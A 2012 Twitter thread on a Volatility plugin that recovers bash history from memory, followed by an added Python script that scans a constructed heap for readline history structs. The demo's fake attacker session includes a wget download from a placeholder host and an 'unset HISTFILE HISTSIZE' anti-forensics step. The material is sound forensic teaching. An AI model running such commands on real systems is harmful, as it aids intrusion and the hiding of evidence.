Month of @volatility plugins teaser: Recovering .bash_history from memory, even in the face of anti-forensics: pastebin.com/Pj39TMrU #dfir
@attrc Does it only work if history timestamps are enabled?
@hal_pomeranz Nope, that's the awesome part: bash keeps them anyway.
Replying to @attrc
@attrc Ah, I gotcha: identifying the bash processes and sucking the history out?

Sep 9, 2012 · 10:28 PM UTC

Replying to @hal_pomeranz
@hal_pomeranz Yep, using the structures in memory, so you get the time run and the command together.
Replying to @hal_pomeranz
@hal_pomeranz Also works if HISTFILE / HISTSIZE is unset by the attacker.
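How the recovery described in this thread works, as an added example that is not the Volatility plugin from the pastebin link or Andrew Case's code: readline keeps every command bash has seen as a `struct _hist_entry` of three pointers (`line`, `timestamp`, `data`), and bash fills `timestamp` with a `"#<epoch>"` string whether or not `HISTTIMEFORMAT` is set, so the heap of a live bash process contains the command text, the time it ran, and a struct tying the two together even when the attacker has unset `HISTFILE` or `HISTSIZE`. The scanner below finds the `"#<digits>"` strings first, then looks for struct entries whose second pointer points at one of them and reads the command through the first pointer. The heap image, base address, and commands are constructed for the demo; a 64-bit little-endian layout and 8-byte struct alignment are assumptions.

```python
"""Recover bash history entries from a process heap image by scanning for
readline _hist_entry structs. Example code, not Volatility's linux_bash plugin."""
import re
import struct

POINTER_SIZE = 8
HEAP_BASE = 0x00007F3A2C400000  # assumed virtual address of the fake heap below

# bash stores each entry's timestamp as "#<epoch seconds>", NUL-terminated.
TIMESTAMP_RE = re.compile(rb"#(\d{9,10})\x00")


def build_fake_heap(history):
    """Construct a heap image (demo data, not a real dump): command strings and
    '#epoch' timestamps laid out first, then the _hist_entry structs pointing at
    them, plus one decoy timestamp string that no struct references."""
    blob = bytearray(b"\x00" * 64)  # leading padding, as any real heap would have
    entries = []
    for cmd, epoch in history:
        line_off = len(blob)
        blob += cmd.encode() + b"\x00"
        ts_off = len(blob)
        blob += b"#%d\x00" % epoch
        entries.append((line_off, ts_off))
    blob += b"#1346000000\x00"  # decoy: looks like a timestamp, has no struct
    while len(blob) % POINTER_SIZE:
        blob += b"\x00"
    for line_off, ts_off in entries:
        # struct _hist_entry { char *line; char *timestamp; histdata_t data; }
        blob += struct.pack("<QQQ", HEAP_BASE + line_off, HEAP_BASE + ts_off, 0)
    return bytes(blob)


def read_cstring(blob, off, limit=4096):
    """Return the printable ASCII NUL-terminated string at off, or None."""
    end = blob.find(b"\x00", off, off + limit)
    if end == -1 or end == off:
        return None
    s = blob[off:end]
    if any(b < 0x20 or b > 0x7E for b in s):
        return None
    return s.decode("ascii")


def recover_history(blob, base):
    """Two-pass scan: (1) index every '#epoch' string by heap offset, (2) walk
    the heap pointer-by-pointer looking for a _hist_entry whose timestamp
    pointer hits one of those strings, then dereference its line pointer.
    Returns [(epoch, command), ...] in chronological order."""
    ts_offsets = {m.start(): int(m.group(1)) for m in TIMESTAMP_RE.finditer(blob)}
    results = []
    for off in range(0, len(blob) - 2 * POINTER_SIZE + 1, POINTER_SIZE):
        line_ptr, ts_ptr = struct.unpack_from("<QQ", blob, off)
        ts_off = ts_ptr - base
        if ts_off not in ts_offsets:
            continue
        line_off = line_ptr - base
        if not 0 <= line_off < len(blob):
            continue
        cmd = read_cstring(blob, line_off)
        if cmd is None:
            continue  # pointer pair matched a timestamp but the line is garbage
        results.append((ts_offsets[ts_off], cmd))
    results.sort()
    return results


def demo():
    """Constructed session: the last command is the anti-forensics step, and it
    is recovered like any other because bash never wrote it to disk anyway."""
    session = [
        ("cd /tmp", 1347229680),
        ("wget http://example.invalid/x", 1347229702),
        ("unset HISTFILE HISTSIZE", 1347229715),
    ]
    return recover_history(build_fake_heap(session), HEAP_BASE)


if __name__ == "__main__":
    for epoch, cmd in demo():
        print(epoch, cmd)
```

Against a real dump the same two passes run over the heap VMA of each bash process, with the base taken from the process's memory map rather than a constant; the second pass is what rejects stray `#<digits>` strings (here the decoy) that a plain string search would report as history.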